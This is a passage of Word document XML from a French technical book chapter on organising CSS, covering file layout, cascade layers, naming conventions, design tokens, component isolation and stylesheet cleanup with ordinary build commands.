                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenir plusieurs règles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La règle de dépendance est simple : une couche ne dépend que des couches inférieures. Un composant peut utiliser les jetons et la base, jamais un utilitaire défini plus haut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.2 Organiser les fichiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux approches dominent : un fichier unique de plusieurs milliers de lignes, ou un découpage par rôle. Le découpage facilite la navigation et la revue de code ; il exige une convention de nommage claire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un découpage lisible, même sans préprocesseur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css/</w:t>
        <w:br/>
        <w:t>├── main.css                  # importe tout, dans l'ordre</w:t>
        <w:br/>
        <w:t>├── base/</w:t>
        <w:br/>
        <w:t>│   ├── _reset.css</w:t>
        <w:br/>
        <w:t>│   ├── _typographie.css</w:t>
        <w:br/>
        <w:t>│   └── _formulaires.css</w:t>
        <w:br/>
        <w:t>├── jetons/</w:t>
        <w:br/>
        <w:t>│   ├── _couleurs.css</w:t>
        <w:br/>
        <w:t>│   ├── _espacements.css</w:t>
        <w:br/>
        <w:t>│   └── _typographie.css</w:t>
        <w:br/>
        <w:t>├── mise-en-page/</w:t>
        <w:br/>
        <w:t>│   ├── _conteneur.css</w:t>
        <w:br/>
        <w:t>│   └── _sections.css</w:t>
        <w:br/>
        <w:t>├── composants/</w:t>
        <w:br/>
        <w:t>│   ├── _bouton.css</w:t>
        <w:br/>
        <w:t>│   ├── _carte.css</w:t>
        <w:br/>
        <w:t>│   └── _navigation.css</w:t>
        <w:br/>
        <w:t>└── utilitaires/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── _aide.css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les couches rendent l'ordre explicite et vérifiable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main.css : l'ordre est la documentation */</w:t>
        <w:br/>
        <w:t>@layer reset, jetons, base, mise-en-page, composants, utilitaires;</w:t>
        <w:br/>
        <w:br/>
        <w:t>@import url("base/_reset.css") layer(reset);</w:t>
        <w:br/>
        <w:t>@import url("jetons/_couleurs.css") layer(jetons);</w:t>
        <w:br/>
        <w:t>@import url("base/_typographie.css") layer(base);</w:t>
        <w:br/>
        <w:t>@import url("mise-en-page/_conteneur.css") layer(mise-en-page);</w:t>
        <w:br/>
        <w:t>@import url("composants/_bouton.css") layer(composants);</w:t>
        <w:br/>
        <w:t>@import url("utilitaires/_aide.css") layer(utilitaires);</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`@IMPORT` RETARDE LE CHARGEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Chaque </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> déclenche une requête supplémentaire en cascade. En production, préférez un outil de construction qui fusionne les fichiers, ou un seul fichier généré. Les couches restent utiles après fusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.3 Conventions de nommage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une convention n'est bonne que si elle est appliquée partout. Trois familles coexistent : les préfixes de composant (BEM), les classes utilitaires (type Tailwind) et les modules CSS (nommage local généré).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.57 — Quatre approches de nommage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168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Approche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Faiblesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1681"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.carte__titre--large</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lisibilité, autonomie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Noms longs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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Utilitaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>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mt-4 text-sm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Composition rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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HTML verbeux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1681"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modules CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.carte_titre_ab12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolation stricte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2292"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Outillage requis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="168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CSS-in-JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>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styled(Carte)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Colocalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Poids, complexité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Quelle que soit l'approche, trois règles universelles s'appliquent : un nom décrit un rôle, jamais une apparence ni une position ; les classes se combinent par composition ; les identifiants ne servent pas au style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Nommer par rôle rend le code résistant aux changements de charte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 Mauvais : apparence et position --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div class="bleu colonne-gauche grand-texte"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Bon : rôle --&gt;</w:t>
        <w:br/>
        <w:t>&lt;aside class="encart encart--mise-en-avant"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.4 Jetons de conception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les jetons sont les valeurs de base du système : couleurs, espacements, rayons, ombres, durées, tailles de police. Centralisés, ils permettent de changer l'identité d'un site en quelques lignes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un jeu de jetons complet, mais court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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /* Espacements, échelle de 4 px */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-1: .25rem;  --espace-2: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-3: .75rem;  --espace-4: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-6: 1.5rem;  --espace-8: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-12: 3rem;   --espace-16: 4rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Rayons */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon-s: 4px; --rayon-m: 8px; --rayon-l: 16px; --rayon-pilule: 999px;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Typographie */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --police-titre: "Arial", system-ui, sans-serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --police-texte: "Times New Roman", Georgia, serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-s: .875rem; --taille-m: 1.0625rem; --taille-l: 1.5rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  /* Mouvement */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --duree-rapide: 150ms; --duree-normale: 250ms;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une échelle d'espacement de 4 pixels évite les valeurs arbitraires (13 px, 27 px) et produit un rythme visuel régulier. Huit valeurs suffisent à couvrir l'essentiel d'un site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.5 Isoler les composants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant ne doit pas être modifié par son contexte. Deux techniques l'en empêchent : les couches, qui figent l'ordre de priorité, et les contextes d'empilement locaux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La variante explicite remplace la surcharge contextuelle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@layer composants {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { padding: var(--espace-4); }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Le contexte ne modifie pas le composant */</w:t>
        <w:br/>
        <w:t>.sidebar .carte { padding: var(--espace-2); }  /* à éviter */</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Mieux : une variante explicite */</w:t>
        <w:br/>
        <w:t>.carte--compacte { padding: var(--espace-2); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les variables CSS participent à l'isolation : un composant peut redéfinir ses propres jetons localement sans affecter le reste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un composant qui porte ses propres jetons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.carte--sombre {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-fond: #16222e;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--couleur-fond);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--couleur-texte);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Tous les enfants héritent des nouvelles valeurs, sans règle supplémentaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">  */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.6 Mesurer et nettoyer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le CSS mort s'accumule : classes supprimées du HTML, règles remplacées, variantes oubliées. Un audit périodique maintient le poids et la lisibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux mesures simples et un nettoyage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Compter les règles et la taille du fichier</w:t>
        <w:br/>
        <w:t>$ wc -l css/**/*.css</w:t>
        <w:br/>
        <w:t>$ npx cssnano css/main.css -o build/main.min.css</w:t>
        <w:br/>
        <w:br/>
        <w:t># Repérer les classes jamais utilisées (outil d'analyse)</w:t>
        <w:br/>
        <w:t>$ npx purgecss --css css/main.css --content "**/*.html" --output build/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.58 — Cinq indicateurs de santé d'une feuille de style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44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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Seuil d'alerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille du CSS (gzip)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 100 Ko</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fusionner, purger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="344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 xml:space="preserve">Nombre de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>!important</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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&gt; 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Revoir la cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Profondeur des sélecteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 3 niveaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
